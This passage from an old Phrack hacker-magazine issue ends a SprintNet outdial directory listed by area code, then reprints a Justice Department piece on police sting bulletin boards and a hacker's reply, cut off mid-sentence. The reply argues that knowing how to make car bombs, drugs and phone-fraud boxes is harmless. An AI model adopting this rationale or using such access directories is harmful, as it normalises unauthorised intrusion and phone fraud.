  201 NJNEW 896 902 904 907 909 912 913 915 916 923 925 926 931 933 935
  201 NJNEW 939 941 942 943 944 945 947 952 955 956 960 961 963 964 965
  201 NJNEW 966 969 977 991 992 994 997 998
1 908 NJNEW 200 232 233 241 245 272 273 276 277 289 298 317 322 351 352
1 908 NJNEW 353 354 355 381 382 388 396 419 464 474 486 499 522 527 541
1 908 NJNEW 558 574 582 594 602 634 636 654 665 686 687 688 709 737 750
1 908 NJNEW 760 771 789 815 820 851 855 862 889 913 925 931 964 965 969
  516 NYHEM 220 221 222 223 227 228 229 235 236 237 238 239 248 249 252
  516 NYHEM 255 264 270 285 292 293 294 295 296 299 326 328 333 334 335
  516 NYHEM 336 338 346 349 352 354 355 357 358 364 365 367 371 374 378
  516 NYHEM 379 383 384 391 394 420 431 432 433 437 454 463 466 481 482
  516 NYHEM 483 484 485 486 487 488 489 496 520 521 522 526 531 535 536
  516 NYHEM 538 541 542 546 559 560 561 562 564 565 566 568 569 573 574
  516 NYHEM 575 576 577 579 593 596 598 599 621 623 624 625 626 627 628
  516 NYHEM 629 644 647 656 658 659 663 671 674 676 677 678 679 681 682
  516 NYHEM 683 684 686 691 692 694 731 733 735 739 741 742 745 746 747
  516 NYHEM 752 753 755 756 759 763 764 766 767 773 775 777 781 783 785
  516 NYHEM 789 791 794 795 796 797 798 799 822 823 824 825 826 829 832
  516 NYHEM 833 842 844 845 847 867 868 869 872 873 876 877 883 887 889
  516 NYHEM 890 897 921 922 925 926 931 932 933 934 935 937 938 939 942
  516 NYHEM 943 944 949 997
  212 NYNYO 200 205 206 207 208 210 213 214 216 218 219 220 221 222 223
  212 NYNYO 225 226 227 228 230 231 232 233 234 235 236 237 238 239 240
  212 NYNYO 241 242 243 244 245 246 247 248 249 250 251 252 254 255 260
  212 NYNYO 262 264 265 266 267 268 269 272 276 277 279 280 281 283 285
  212 NYNYO 286 288 289 290 291 292 293 294 295 296 297 298 299 301 302
  212 NYNYO 303 304 305 306 307 308 309 310 312 313 314 315 316 319 320
  212 NYNYO 321 322 323 324 325 326 328 329 330 333 334 335 337 339 340
  212 NYNYO 341 342 344 346 348 349 350 351 352 353 354 355 356 357 358
  212 NYNYO 359 360 361 362 363 364 365 367 368 369 370 371 373 374 378
  212 NYNYO 379 380 382 385 390 391 392 393 395 396 397 398 399 401 402
  212 NYNYO 404 406 407 408 409 410 412 413 414 415 416 418 419 420 421
  212 NYNYO 422 425 427 428 430 431 432 433 436 437 439 440 446 447 448
  212 NYNYO 449 451 452 453 455 456 457 458 459 460 461 463 464 465 466
  212 NYNYO 467 468 469 472 473 474 475 476 477 480 481 482 483 484 485
  212 NYNYO 486 487 488 489 490 491 492 493 495 496 502 503 504 505 506
  212 NYNYO 508 509 510 512 513 514 515 517 518 519 520 521 522 523 524
  212 NYNYO 525 527 528 529 530 531 532 533 534 535 536 537 538 541 542
  212 NYNYO 543 545 546 547 548 549 551 552 553 554 556 557 558 559 560
  212 NYNYO 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575
  212 NYNYO 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590
  212 NYNYO 593 594 595 597 598 599 601 602 603 605 606 607 608 609 610
  212 NYNYO 612 613 614 616 617 618 619 620 621 623 624 625 627 628 629
  212 NYNYO 632 633 635 637 639 640 641 642 643 644 645 648 649 650 652
  212 NYNYO 653 654 655 656 657 658 659 661 662 663 664 665 666 667 668
  212 NYNYO 669 671 673 674 675 676 677 678 679 681 682 683 684 685 686
  212 NYNYO 687 688 689 690 691 692 693 694 695 696 697 698 701 702 703
  212 NYNYO 704 705 707 708 709 711 713 714 715 716 717 719 720 721 722
  212 NYNYO 724 725 727 730 731 732 733 734 735 736 737 740 741 742 744
  212 NYNYO 745 746 747 749 750 751 752 753 754 755 757 758 759 760 761
  212 NYNYO 764 765 766 767 768 769 770 772 775 776 777 779 781 785 786
  212 NYNYO 787 790 791 792 793 794 795 796 797 798 799 804 806 807 808
  212 NYNYO 809 812 813 815 818 819 820 822 823 824 825 826 827 828 829
  212 NYNYO 830 831 832 836 837 838 839 840 841 842 844 847 848 850 852
  212 NYNYO 853 854 855 856 858 860 861 862 863 864 865 866 867 868 869
  212 NYNYO 870 871 872 873 874 876 877 878 879 880 881 882 883 884 885
  212 NYNYO 886 887 888 889 891 892 893 898 899 901 902 903 904 905 906
  212 NYNYO 907 908 909 912 916 918 920 921 922 923 924 925 926 927 928
  212 NYNYO 929 930 931 932 933 935 936 938 940 941 942 943 944 945 947
  212 NYNYO 949 951 952 953 954 955 956 957 960 962 963 964 966 967 968
  212 NYNYO 969 971 972 973 974 975 977 978 979 980 982 983 984 985 986
  212 NYNYO 988 989 991 992 993 994 995 996 997 998 999
1 516 NYNYO 221 222 223 227 228 229 235 236 237 238 239 248 249 252 255
1 516 NYNYO 264 270 285 292 293 294 295 296 299 326 328 333 334 336 338
1 516 NYNYO 346 349 352 354 357 358 364 365 367 371 374 378 379 391 420
1 516 NYNYO 431 432 433 437 454 463 466 481 482 483 484 485 486 487 488
1 516 NYNYO 489 496 520 521 526 531 535 536 538 541 542 546 559 560 561
1 516 NYNYO 562 564 565 566 568 569 574 575 576 577 579 593 596 598 599
1 516 NYNYO 621 623 624 625 626 627 628 629 644 647 656 658 663 671 674
1 516 NYNYO 676 677 678 679 681 682 683 684 686 691 692 694 731 733 735
1 516 NYNYO 739 741 742 745 746 747 752 753 755 756 759 763 764 766 767
1 516 NYNYO 773 775 781 783 785 789 791 794 795 796 797 798 799 822 823
1 516 NYNYO 824 825 826 829 832 842 844 845 847 867 868 869 872 873 876
1 516 NYNYO 877 883 887 889 890 897 921 922 926 931 932 933 934 935 937
1 516 NYNYO 938 939 942 943 944 949 997
1 718 NYNYO 200 204 209 217 221 224 225 229 230 232 233 234 235 236 237
1 718 NYNYO 238 240 241 244 247 248 251 252 253 256 257 258 259 260 261
1 718 NYNYO 262 263 265 266 267 268 270 271 272 273 274 275 276 277 278
1 718 NYNYO 279 282 284 287 291 296 297 317 318 321 322 326 327 330 331
1 718 NYNYO 332 335 336 337 338 339 341 342 343 345 346 347 349 351 352
1 718 NYNYO 353 354 356 357 358 359 360 361 363 366 370 372 373 375 376
1 718 NYNYO 377 380 381 383 384 385 386 387 388 389 390 392 395 397 398
1 718 NYNYO 403 417 421 423 424 426 428 429 434 435 436 438 439 441 442
1 718 NYNYO 443 444 445 446 447 448 449 451 452 453 454 455 456 457 458
1 718 NYNYO 459 461 462 463 464 465 467 468 469 470 471 474 476 478 479
1 718 NYNYO 480 481 482 485 486 489 492 493 494 495 497 498 499 507 520
1 718 NYNYO 522 523 525 526 527 528 529 531 533 539 541 544 545 552 557
1 718 NYNYO 565 571 574 575 591 592 596 599 604 615 622 624 625 626 627
1 718 NYNYO 628 629 630 631 632 633 634 636 638 639 641 642 643 644 645
1 718 NYNYO 646 647 648 649 651 656 657 658 659 667 670 672 680 692 693
1 718 NYNYO 694 698 699 706 712 720 721 723 726 727 728 729 735 738 739
1 718 NYNYO 740 743 745 746 748 754 755 756 760 761 762 763 764 767 768
1 718 NYNYO 769 771 773 774 776 778 779 780 782 783 784 786 788 789 793
1 718 NYNYO 797 802 803 805 816 821 826 827 830 831 832 833 834 835 836
1 718 NYNYO 837 843 845 846 847 848 849 851 852 853 854 855 856 857 858
1 718 NYNYO 859 868 871 875 876 883 886 891 894 895 896 897 898 899 917
1 718 NYNYO 919 921 922 927 932 934 935 937 938 939 941 942 945 946 948
1 718 NYNYO 949 951 953 955 956 961 962 963 965 966 967 968 969 972 977
1 718 NYNYO 978 979 981 983 984 987 990 995 996 997 998 999
1 914 NYNYO 235 237 251 253 270 282 285 286 287 288 289 321 328 332 333
1 914 NYNYO 335 337 345 347 375 376 378 381 390 391 395 397 422 423 428
1 914 NYNYO 472 476 478 523 524 576 591 592 631 632 633 636 641 642 644
1 914 NYNYO 654 662 664 665 667 668 674 681 682 683 684 686 693 694 696
1 914 NYNYO 697 698 699 721 723 725 738 761 768 771 776 779 784 789 792
1 914 NYNYO 793 833 834 835 899 921 925 933 934 935 937 939 946 948 949
1 914 NYNYO 961 963 964 965 967 968 969 993 997
  216 OHCLE 221 226 228 229 231 232 234 235 236 237 238 241 243 247 248
  216 OHCLE 249 251 252 261 265 266 267 268 271 278 281 283 289 291 292
  216 OHCLE 295 299 321 328 331 333 338 341 344 348 349 351 356 361 362
  216 OHCLE 363 368 371 381 382 383 389 391 397 398 421 423 425 429 431
  216 OHCLE 432 433 439 441 442 443 444 445 446 447 449 451 459 461 463
  216 OHCLE 464 467 468 469 471 473 475 476 479 481 486 487 491 521 522
  216 OHCLE 523 524 526 529 531 541 543 561 562 566 572 574 575 578 579
  216 OHCLE 581 582 585 586 587 589 591 621 622 623 631 634 641 642 646
  216 OHCLE 651 656 659 661 662 663 664 671 676 681 687 689 691 692 694
  216 OHCLE 696 721 728 729 731 732 734 736 737 741 749 751 752 754 761
  216 OHCLE 765 766 771 777 779 781 789 791 795 822 826 831 835 838 842
  216 OHCLE 843 844 845 851 861 871 881 883 884 885 886 888 891 892 899
  216 OHCLE 921 931 932 941 942 943 944 946 951 953 961 975 987 991 995
  614 OHCOL 221 222 223 224 225 227 228 229 231 235 236 237 238 239 243
  614 OHCOL 248 249 251 252 253 258 261 262 263 265 267 268 271 272 274
  614 OHCOL 275 276 278 279 281 288 291 292 293 294 296 297 299 325 329
  614 OHCOL 337 338 341 351 361 365 371 395 421 424 431 433 436 438 442
  614 OHCOL 443 444 445 447 451 457 459 460 461 462 463 464 466 469 471
  614 OHCOL 475 476 478 479 481 486 487 488 491 492 497 523 538 548 575
  614 OHCOL 621 644 645 752 755 756 759 761 764 766 771 777 785 786 791
  614 OHCOL 792 793 794 821 833 836 837 841 842 846 847 848 851 852 855
  614 OHCOL 860 861 863 864 866 868 870 871 875 876 877 878 879 881 882
  614 OHCOL 885 888 889 890 891 895 898 899 927 964 965
  503 ORPOR 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234
  503 ORPOR 235 236 237 238 239 240 241 242 243 244 245 246 248 249 250
  503 ORPOR 251 252 253 254 255 256 257 273 274 275 279 280 281 282 283
  503 ORPOR 284 285 286 287 288 289 291 292 293 294 295 297 299 323 324
  503 ORPOR 326 335 357 359 452 464 526 591 620 621 624 625 626 627 628
  503 ORPOR 629 630 631 632 635 636 637 638 639 640 641 642 643 644 645
  503 ORPOR 646 647 648 649 650 652 653 654 655 656 657 658 659 661 663
  503 ORPOR 665 666 667 668 669 677 681 682 684 685 690 691 692 693 694
  503 ORPOR 695 696 697 698 721 731 733 760 761 771 774 775 777 778 781
  503 ORPOR 789 790 796 936 976 985
  215 PAPHI 221 222 223 224 225 226 227 228 229 231 232 233 235 236 237
  215 PAPHI 238 241 242 243 244 245 246 247 248 254 259 260 263 265 270
  215 PAPHI 271 272 275 276 277 278 279 280 281 283 284 288 289 291 293
  215 PAPHI 299 324 328 329 330 331 332 333 334 335 336 337 338 339 341
  215 PAPHI 342 349 350 351 352 353 354 356 359 365 379 382 386 387 389
  215 PAPHI 422 423 424 425 426 427 438 440 446 447 448 449 450 452 455
  215 PAPHI 456 457 460 461 462 463 464 465 466 467 468 470 471 472 473
  215 PAPHI 474 476 477 480 482 483 485 487 490 492 494 496 497 499 520
  215 PAPHI 521 522 523 525 526 527 528 531 532 533 534 535 537 539 540
  215 PAPHI 542 543 544 545 546 548 549 551 552 553 557 560 561 563 564
  215 PAPHI 565 566 567 568 569 570 572 573 574 576 577 578 580 581 583
  215 PAPHI 585 586 587 590 591 592 595 596 597 620 621 622 623 624 625
  215 PAPHI 626 627 628 629 630 631 632 634 635 636 637 638 639 641 642
  215 PAPHI 643 645 646 649 653 657 659 660 662 663 664 665 667 668 671
  215 PAPHI 673 676 677 680 684 685 686 687 688 690 697 698 722 724 725
  215 PAPHI 726 727 728 729 732 734 735 737 739 742 743 744 745 747 748
  215 PAPHI 751 753 755 761 763 765 768 769 782 784 786 787 789 790 823
  215 PAPHI 824 825 828 829 830 831 833 834 835 836 839 840 841 842 843
  215 PAPHI 844 846 848 849 851 853 854 864 870 871 872 874 875 876 877
  215 PAPHI 878 879 880 881 884 885 886 887 891 892 893 894 895 896 897
  215 PAPHI 898 899 920 922 923 924 925 927 928 930 931 934 936 937 938
  215 PAPHI 940 941 947 951 952 955 960 961 962 963 964 969 971 972 973
  215 PAPHI 975 977 978 980 981 985 986 988 990 991 998
  412 PAPIT 200 221 227 231 232 234 236 237 241 242 243 244 247 255 256
  412 PAPIT 257 261 262 263 264 268 269 271 273 276 279 281 288 298 321
  412 PAPIT 322 323 328 331 333 338 341 343 344 351 355 359 361 362 363
  412 PAPIT 364 365 366 367 369 371 372 373 374 381 389 391 392 393 394
  412 PAPIT 421 422 427 429 431 433 434 441 442 456 461 462 464 466 469
  412 PAPIT 471 472 476 481 486 487 488 491 492 497 521 531 551 553 561
  412 PAPIT 562 563 565 566 571 572 578 594 621 622 623 624 633 636 642
  412 PAPIT 644 645 647 648 653 655 661 664 665 672 673 674 675 678 681
  412 PAPIT 682 683 687 692 699 731 734 741 747 749 751 754 761 762 765
  412 PAPIT 766 767 771 777 778 781 782 784 787 788 793 795 798 821 822
  412 PAPIT 823 824 825 826 828 829 831 833 835 840 854 855 856 858 859
  412 PAPIT 881 882 884 885 889 892 921 922 923 928 931 936 937 939 961
  412 PAPIT 963 967
1 601 TNMEM 342 349 393 781 851
  901 TNMEM 227 272 274 276 278 320 323 324 325 327 332 344 345 346 348
  901 TNMEM 353 357 358 360 362 363 365 366 367 368 369 371 372 373 375
  901 TNMEM 377 382 385 386 387 388 395 396 397 398 452 454 458 465 475
  901 TNMEM 476 483 484 485 486 521 522 523 524 525 526 527 528 529 531
  901 TNMEM 532 533 535 543 544 572 575 576 577 578 579 597 654 678 681
  901 TNMEM 682 683 684 685 721 722 725 726 728 729 743 744 745 747 748
  901 TNMEM 752 753 754 755 756 757 758 761 762 763 765 766 767 774 775
  901 TNMEM 785 789 794 795 797 829 853 854 867 872 873 876 877 922 942
  901 TNMEM 946 947 948 976
  512 TXAUS 218 219 243 244 247 250 251 255 258 259 261 263 264 266 267
  512 TXAUS 272 276 280 282 288 292 320 322 323 326 327 328 329 331 335
  512 TXAUS 338 339 343 345 346 356 369 370 371 385 386 388 389 390 397
  512 TXAUS 403 416 422 440 441 442 443 444 445 447 448 450 451 452 453
  512 TXAUS 454 458 459 461 462 463 465 467 469 471 472 473 474 475 476
  512 TXAUS 477 478 479 480 482 483 495 499 750 794 823 832 834 835 836
  512 TXAUS 837 838 860 867 870 873 891 892 926 928 929 940 941 973 984
  512 TXAUS 990
  214 TXDAL 202 203 204 205 212 216 217 218 219 220 221 222 223 224 225
  214 TXDAL 226 227 228 229 230 231 233 234 235 238 239 240 241 242 243
  214 TXDAL 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258
  214 TXDAL 259 260 262 263 264 266 269 270 271 272 275 276 278 279 281
  214 TXDAL 284 285 286 287 288 289 290 291 293 296 298 299 301 302 303
  214 TXDAL 305 306 307 308 309 313 314 315 316 317 318 319 320 321 323
  214 TXDAL 324 327 328 330 331 332 333 336 337 339 340 341 343 348 349
  214 TXDAL 350 351 352 353 357 358 360 361 363 368 369 371 372 373 374
  214 TXDAL 375 376 380 381 384 385 386 387 388 391 392 393 394 397 398
  214 TXDAL 399 401 402 403 404 406 407 412 413 414 416 417 418 420 421
  214 TXDAL 422 423 424 426 428 434 436 437 438 441 442 443 444 445 446
  214 TXDAL 450 453 456 458 462 464 466 470 471 475 480 484 487 490 492
  214 TXDAL 494 495 497 502 503 504 506 508 513 514 516 517 518 519 520
  214 TXDAL 521 522 526 528 530 533 539 541 550 553 554 556 557 558 559
  214 TXDAL 565 570 573 574 575 578 579 580 590 591 594 596 601 602 603
  214 TXDAL 604 605 606 607 608 609 612 613 615 616 618 620 621 630 631
  214 TXDAL 634 637 638 641 642 644 647 650 651 653 655 658 659 660 661
  214 TXDAL 669 670 676 680 681 686 688 689 690 691 692 696 698 699 701
  214 TXDAL 702 704 705 706 707 708 709 712 713 714 715 716 717 718 720
  214 TXDAL 721 724 727 733 739 740 741 742 744 745 746 747 748 749 750
  214 TXDAL 751 754 760 761 767 770 771 780 781 783 787 788 790 791 799
  214 TXDAL 804 808 812 815 818 819 820 821 823 824 826 827 828 830 840
  214 TXDAL 841 844 850 851 855 864 867 869 871 879 880 881 888 890 891
  214 TXDAL 902 904 905 907 909 913 917 918 919 920 922 929 931 933 934
  214 TXDAL 939 941 942 943 944 946 948 949 951 952 953 954 956 957 960
  214 TXDAL 964 969 977 978 979 980 985 986 987 988 991 992 993 995 996
  214 TXDAL 997 999
1 817 TXDAL 261 265 267 268 273 329 355 356 366 379 421 424 425 429 430
1 817 TXDAL 432 449 450 461 467 469 475 477 481 498 530 540 543 572 577
1 817 TXDAL 588 589 640 654 667 671 679 695 784 792 832 856 884 890 922
1 817 TXDAL 925 929 930 961 962 963 967
  713 TXHOU 200 220 221 222 223 224 225 226 227 228 229 230 233 235 236
  713 TXHOU 237 238 240 241 242 244 246 247 252 253 254 261 263 264 265
  713 TXHOU 266 267 268 269 270 271 272 274 277 278 280 282 283 284 285
  713 TXHOU 286 287 289 293 295 320 324 326 328 331 332 333 334 335 336
  713 TXHOU 337 338 339 341 342 343 346 347 350 351 353 354 355 356 358
  713 TXHOU 359 360 363 364 367 370 371 373 374 376 377 378 383 388 390
  713 TXHOU 391 392 393 394 395 420 421 422 424 425 426 427 428 431 432
  713 TXHOU 433 434 436 437 438 439 440 441 442 443 444 445 446 447 448
  713 TXHOU 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463
  713 TXHOU 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478
  713 TXHOU 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493
  713 TXHOU 494 495 496 497 498 499 520 521 522 523 524 525 526 527 528
  713 TXHOU 529 530 531 535 536 537 540 541 542 546 547 548 549 550 551
  713 TXHOU 552 556 558 561 563 565 568 571 575 577 578 579 580 583 584
  713 TXHOU 586 587 588 589 590 591 596 599 620 621 622 623 626 627 629
  713 TXHOU 630 631 633 635 636 639 640 641 643 644 645 649 650 651 652
  713 TXHOU 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667
  713 TXHOU 668 669 670 671 672 673 674 675 676 678 679 680 681 682 683
  713 TXHOU 684 685 686 688 690 691 692 694 695 696 697 699 720 721 723
  713 TXHOU 726 728 729 731 732 733 734 738 739 741 744 746 747 748 749
  713 TXHOU 750 751 752 753 754 757 758 759 761 762 763 764 765 768 769
  713 TXHOU 771 772 774 775 776 777 778 779 780 781 782 783 784 785 786
  713 TXHOU 787 788 789 790 791 792 793 794 795 796 797 798 799 820 821
  713 TXHOU 822 823 824 825 826 827 828 829 831 833 834 835 836 840 841
  713 TXHOU 842 844 845 846 847 850 852 853 854 855 856 857 858 859 861
  713 TXHOU 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876
  713 TXHOU 877 878 879 880 882 883 884 886 888 890 891 892 893 894 895
  713 TXHOU 896 897 898 899 920 921 922 923 924 926 928 929 930 931 932
  713 TXHOU 933 935 937 938 939 940 941 943 944 946 947 948 951 952 953
  713 TXHOU 954 955 956 957 960 961 963 964 965 966 967 968 969 971 972
  713 TXHOU 973 974 975 977 978 980 981 983 984 985 986 987 988 989 991
  713 TXHOU 992 993 995 996 997 998 999
  801 UTSLC 220 237 240 250 251 252 254 255 261 262 263 264 265 266 268
  801 UTSLC 269 272 273 277 278 287 292 295 298 299 321 322 328 350 355
  801 UTSLC 359 363 364 366 451 460 461 466 467 468 480 481 482 483 484
  801 UTSLC 485 486 487 488 521 522 524 526 530 531 532 533 534 535 536
  801 UTSLC 537 538 539 543 544 546 547 549 561 562 565 566 569 570 571
  801 UTSLC 572 573 575 576 578 579 580 581 582 583 584 585 588 594 595
  801 UTSLC 596 633 799 933 942 943 944 947 964 965 966 967 968 969 972
  801 UTSLC 973 974 975 977
  206 WASEA 223 224 226 227 228 232 233 234 235 236 237 241 242 243 244
  206 WASEA 246 248 251 255 271 277 281 282 283 284 285 286 287 292 296
  206 WASEA 298 320 322 323 324 325 326 328 329 340 343 344 345 346 358
  206 WASEA 361 362 363 364 365 367 368 382 386 389 391 392 393 394 395
  206 WASEA 421 431 432 433 439 441 442 443 447 448 451 453 454 455 461
  206 WASEA 462 464 467 477 481 483 485 486 487 488 489 522 523 524 525
  206 WASEA 526 527 528 542 543 544 545 546 547 548 554 557 562 575 583
  206 WASEA 585 587 621 622 623 624 625 626 628 630 631 632 633 634 635
  206 WASEA 637 639 641 643 644 646 649 654 655 656 657 661 662 667 670
  206 WASEA 672 682 684 685 720 721 722 723 725 726 727 728 742 743 744
  206 WASEA 745 746 747 762 763 764 767 768 771 772 773 774 775 776 778
  206 WASEA 781 782 783 784 787 788 789 820 821 822 823 824 827 828 836
  206 WASEA 838 839 842 850 852 854 859 861 865 867 868 869 870 872 874
  206 WASEA 878 880 881 882 883 885 889 930 932 933 935 936 937 938 940
  206 WASEA 941 946 947 948 949 953 954 955 965 969 972 977 979 982 986
  206 WASEA 989 991 993 994 995 996 997 998 999
  414 WIMIL 221 222 223 224 225 226 227 228 229 237 241 242 243 246 251
  414 WIMIL 252 253 254 255 256 257 258 259 263 264 265 266 271 272 273
  414 WIMIL 274 276 277 278 281 282 283 287 288 289 291 297 298 299 321
  414 WIMIL 322 323 327 332 341 342 343 344 345 347 351 352 353 354 355
  414 WIMIL 357 358 359 362 365 367 372 374 375 377 382 383 384 385 421
  414 WIMIL 422 423 425 427 438 442 444 445 447 449 453 454 461 462 463
  414 WIMIL 464 466 471 475 476 481 482 483 486 491 521 523 524 527 529
  414 WIMIL 535 536 538 541 542 543 544 545 546 547 548 549 562 575 579
  414 WIMIL 581 643 645 647 649 662 663 671 672 678 679 691 744 747 761
  414 WIMIL 762 764 765 768 769 771 774 778 781 782 783 784 785 786 789
  414 WIMIL 791 792 796 797 798 799 821 835 844 871 873 874 881 896 931
  414 WIMIL 933 935 936 937 941 955 961 962 963 964 966

Conclusion
----------

I could hardly take credit for scanning and finding the NUAs that make
make up this list.  I put this list together because the lists I've seen
in the past were either partially incomplete or partially incorrect.  A
list put out by OpusWiz and Dawn Treader several years ago served as the
base data for this list.  I've spoken to many many hackers over the years
to add to and correct the list.  Erik Bloodaxe's Telenet Directory,
published in the Legion of Doom Technical Journals, was of great help in
clarifying and adding to the data.

The list is still neither complete or fully accurate.  For example, I still
don't know the outdials for San Diego, California (619).  The 415 and 714
outdials might be mixed up.  If you have any additions or corrections, please
e/mail one of my Internet accounts.

By the way, the new 510 area code will have an impact on the PC Pursuit
dialout list.  SprintNet hasn't incorporated the new area code into its
lists yet, so I haven't either.  But they will soon, so be aware that the
Oakland, California dialout will change from area code 415 to 510 someday.
_____________________________________________________________________________


--------------------------------------------------------------------------------


                               == Phrack Inc. ==

                 Volume Three, Issue Thirty-five, File 5 of 13

        ______________________________________________________________
      ||                                                              ||
      ||  Don't let THIS happen to you!                               ||
      ||                                                              ||
      ||           __________                                         ||
      ||     Heh  |          |/No life, no future...                  ||
      ||    /Heh! |          0                         H S L Q I F X  ||
      ||   O      |        --|--                                      ||
      || --|--    |         /                                        ||
      ||  /      |        /                                         ||
      || /   \____|____              E  N  _  R  _  P  M  E  N  _     ||
      ||  Dale               ^                                        ||
      ||  Drew               |                                        ||
      ||              Will this be YOU?!                              ||
      ||______________________________________________________________||


The following is a reprint of the article "Sting Operations" from the book
_Dedicated Computer Crime Units_ (pages 101-103) written by J. Thomas McEwen
for the U.S. Department of Justice and published in June 1989.

If you would like to get your own FREE copy of this book, or its companion
books:

- Organizing for Computer Crime Investigation and Prosecution
- Electronic Fund Transfer and Crime
- Electronic Fund Transfer Fraud

you can contact:

U.S. Department of Justice
Office of Justice Programs
National Institute of Justice
Washington, D.C.  20531
(301)251-5500
(800)851-3420
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

                        S T I N G   O P E R A T I O N S
                        ~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~
                        Will *YOU* Be The Next Victim?!

                       Transcribed by Sovereign Immunity


ELECTRONIC BULLETIN BOARDS

An electronic bulletin board allows for the storage of information which can be
retrieved by other systems calling into the board.  It is essentially a
database maintained by a system that is accessible by others over telephone
lines.  Most bulletin boards have been created for specific purposes, usually
for the exchange of messages and information among parties with common
interests.  For example, members of computer clubs maintain bulletin boards for
communicating with each other between meetings.

Bulletin boards are especially popular among microcomputer users.
Establishment of a bulletin board is facilitated by programs that can be
purchased or obtained from public domain software.  With one of these programs,
a user can establish tailored menus for anyone dialing into the board.  These
menus will usually contain options on information about the board, bulletins,
news summaries, personal mail, conferences, and leaving messages.

In addition, most bulletin boards have different levels of access to restrict
users from certain parts of the board.  The bulletin board owner, usually
called the System Operator (SYSOP), personally establishes the authorized
access levels for each user and enters this information into the system.
Access is determined by having a user provide their name and password when
signing on to the system.  A telephone line into the system is the only other
requirement for establishing a board on a microcomputer.

Access to bulletin boards generally operates along the following lines:

- A user dials into the bulletin board.
- The board responds with a message asking for the person's name and password.
- The board then provides a menu showing the options available to the user.
- The user selects an option and starts interacting with the system.
- During a session, a user typically may read messages, leave messages,
  download files, upload files, or join a conference.
- The user eventually "quits" the session and hangs up from the board.

While most bulletin boards have been established for legitimate purposes, there
are also "pirate" or "elite" boards that contain illegal information or have
been established to advance an illegal activity.  Security on those boards is
tightly controlled by the owners.  With these bulletin boards, users usually
have to contact the owner directly to obtain a password for access to different
levels of the system.  A degree of trust must therefore be established before
the owner will allow access to the board, and the owners develop "power" over
who can use the system.

Pirate boards have been found with a variety of illegal information on them
including the following:

- Stolen credit card account numbers
- Long distance telephone service codes
- Telephone numbers to mainframe computers, including passwords and account
  numbers
- Procedures for making illegal drugs
- Procedures for making car bombs
- Hacking programs
- Tips on how to break into computer systems
- Schematics for electronic boxes (e.g., black box)

These boards obviously are a threat to communities, and their existence has
gained the attention of some police departments.


STING OPERATIONS WITH BULLETIN BOARDS

The experiences of the Maricopa County, Arizona, Sheriff's Department and the
Fremont, California, Police Department are very instructive on how local
departments can establish their own bulletin boards and become part of the
network with other boards.  Members of the Maricopa County Sheriff's Department
were the first in the country to establish such a board.  Their board resulted
in over 50 arrests with the usual charge being telecommunications fraud.

In September, 1985, the Fremont Police Department established a bulletin board
for the primary purpose of gathering intelligence on hackers and phreakers in
the area.  The operation was partially funded by VISA, Inc. with additional
support from Wells Fargo Bank, Western Union, Sprint, MCI, and ITT.

After establishing their bulletin board, they advertised it on other boards as
the newest "phreak board" in the area.  Within the first four days, over 300
calls were received on the board.  During the next three months, the board
logged over 2,500 calls from 130 regular users.  Through the bulletin board,
they persuaded these groups that they had stolen or hacked long-distance
telephone service codes and credit account numbers.  They were readily accepted
and were allowed access to pirate boards in the area.

The board was operated for a total of three months.  During that period, over
300 stolen credit card numbers and long-distance telephone service codes were
recovered.  Passwords to many government, educational, and corporate computers
were also discovered on other boards.

The operation resulted in the apprehension of eight teenagers in the area who
were charged with trafficking in stolen credit card accounts, trafficking in
stolen long-distance telephone service codes, and possession of stolen
property.  Within the next week, seven more teenagers in California and other
states were arrested on information from this operation.

It was established that this group had been illegally accessing between ten and
fifteen businesses and institutions in California.  They were regularly
bypassing the security of these systems with stolen phone numbers and access
codes.  One victim company estimated that it intended to spend $10,000 to
improve its security and data integrity procedures.  Other victimized
businesses were proceeding along the same lines.


CONCLUSIONS

There are several reasons for conducting Sting operations of this type.  One of
the most important is that it provides a proactive method of identifying
hackers and phreakers in the area.  These groups are particularly hard to find
since they operate in closed circles with personal networks developed from
friendships.

Another byproduct of these operations is the publicity surrounding the cases.
Sting operations result in considerable amount of attention from the media.
The publicity has the effect of closing down other pirate boards in the area.
One of the greatest fears of these offenders in that their systems will be
taken, and in the Fremont operation over $12,000 of computer equipment was
seized.  The publicity associated with these seizures seems to be the primary
reason for others to stop their pirate boards.

These operations also lead to other types of offenses.  In Fremont, for
example, drug and alcohol cases were developed as a result of the Sting
operation.   This has been typical of these operations.

The Sting operations with bulletin boards have been criticized because
teenagers, rather than hardened criminals, are arrested.  Many hackers believe
that they have a right to the data in other systems and that their activities
are not illegal since the companies can afford the losses.  On the other hand,
as one investigator observed, the hackers of today may be the sophisticated
computer criminals of tomorrow.  It is therefore important to set a lesson
early in their careers steering them away from these offenses.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

RESPONSE FROM A MEMBER OF THE HACKER COMMUNITY:

Now lets take a look at this article and the ignorant author J. Thomas
McEwen.

     "Pirate boards have been found with a variety of illegal
     information on them..."

The author names:

"Telephone numbers to mainframe computers" -- There is nothing illegal in
having the telephone number to a mainframe computer.  It is illegal to access a
computer without authorization.

"Procedures for making illegal drugs" -- It is NOT illegal to know how to
manufacture illegal drugs, only to actually manufacture or use them.

"Procedures for making car bombs" -- It is NOT illegal to know how to
manufacture car bombs, only to actually manufacture or use them.

"Hacking programs" -- Indeed most security companies, private security
consultants, or mainframe owners and operators use these to test their systems
very often.  It would only be illegal to use one on a machine that you are not
authorized to use it on.

"Tips on how to break into computer systems" -- Again, it is NOT illegal to
know how to break into a computer... although for a change, according to a
section of the Computer Fraud & Abuse Act of 1986 (Federal Law), it would be
illegal to traffic in passwords, codes, and theoretically any instructions that
would be the equivalent of passwords or codes for the unauthorized entry into
computer systems.

"Schematics for electronic boxes (e.g., black box)" -- This is getting boring.
It is NOT illegal to know how to build these devices, only the actual
construction or use of them is illegal.


     "These boards obviously are a threat to communities, and their
     existence has gained the attention of some police departments."

How are they obviously a threat?

The author would like us to believe that if the information on how to make
telephone devices, explosives, or narcotics is available on bulletin boards,
this is enough to make them a threat to communities.

What he ignores is that the same information can be found in public and
